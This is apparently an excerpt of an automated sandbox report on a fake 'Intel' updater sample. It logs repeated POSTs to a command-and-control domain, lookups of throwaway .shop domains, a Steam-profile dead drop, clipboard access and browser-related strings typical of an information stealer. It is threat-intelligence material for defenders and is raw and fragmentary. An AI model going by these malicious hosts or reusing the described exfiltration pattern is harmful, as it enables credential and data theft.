Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ETDM57XEJAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15059Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IMCRUI6YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19905Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6KRRDE5XR5UF0LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 901Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RI2MFGUIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1074Host: sputnik-1985.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 116Host: sputnik-1985.com

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F8D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

13_2_00F8D889

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKyg
Source: global traffic	DNS traffic detected: DNS query: lastlossunbag.click
Source: global traffic	DNS traffic detected: DNS query: nearycrepso.shop
Source: global traffic	DNS traffic detected: DNS query: abruptyopsn.shop
Source: global traffic	DNS traffic detected: DNS query: wholersorie.shop
Source: global traffic	DNS traffic detected: DNS query: framekgirus.shop
Source: global traffic	DNS traffic detected: DNS query: tirepublicerj.shop
Source: global traffic	DNS traffic detected: DNS query: noisycuttej.shop
Source: global traffic	DNS traffic detected: DNS query: rabidcowse.shop
Source: global traffic	DNS traffic detected: DNS query: cloudewahsj.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sputnik-1985.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com

Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp, [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Hugo.com, 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmp, Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Enlarge.9.dr, Hugo.com.2.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Hugo.com, 0000000D.00000003.2716136407.00000000049F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastl
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Hugo.com, 0000000D.00000002.2765946345.0000000004880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Hugo.com, 0000000D.00000002.2765602935.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lastlossunbag.click/api
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/LOX
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/Site
Source: Hugo.com, 0000000D.00000003.2717609537.0000000001B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/a
Source: Hugo.com, 0000000D.00000002.2765627357.0000000001A81000.00000004.00000020.00020000.00000000.sdmp, Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api
Source: Hugo.com, 0000000D.00000002.2765946345.00000000048E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api0
Source: Hugo.com, 0000000D.00000002.2765627357.0000000001A81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/apij
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/apijhhCf
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/apila
Source: Hugo.com, 0000000D.00000002.2765479156.0000000001A35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/i~
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/r
Source: Hugo.com, 0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/t
Source: Hugo.com, 0000000D.00000002.2765602935.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com:443/apial
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Hugo.com, 0000000D.00000002.2765946345.0000000004880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/7656119972433190
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: Hugo.com, 0000000D.00000003.2695052302.0000000001B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Hugo.com, 0000000D.00000002.2765676782.0000000001AE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Hugo.com, 0000000D.00000003.2657829422.0000000004D4A000.00000004.00000800.00020000.00000000.sdmp, Hence.9.dr, Hugo.com.2.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: [UPD]Intel_Unit.2.1.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: Hugo.com.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Hugo.com, 0000000D.00000003.2694559579.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, Hugo.com, 0000000D.00000003.2694632546.00000000049E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Hugo.com, 0000000D.00000003.2717558680.00000000049F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: Hugo.com, 0000000D.00000003.2717558680.00000000049F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Hugo.com, 0000000D.00000003.2717261373.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

Source: unknown	Network traffic detected: HTTP traffic on port 50743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50744
Source: unknown	Network traffic detected: HTTP traffic on port 50742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50738
Source: unknown	Network traffic detected: HTTP traffic on port 50740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50740
Source: unknown	Network traffic detected: HTTP traffic on port 50741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50742
Source: unknown	Network traffic detected: HTTP traffic on port 50744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50741
Source: unknown	Network traffic detected: HTTP traffic on port 50739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50737 -> 443

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:50744 version: TLS 1.2

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F8F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

13_2_00F8F7C7

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Code function: 13_2_00F8F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

13_2_00F8F55C

Source: C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

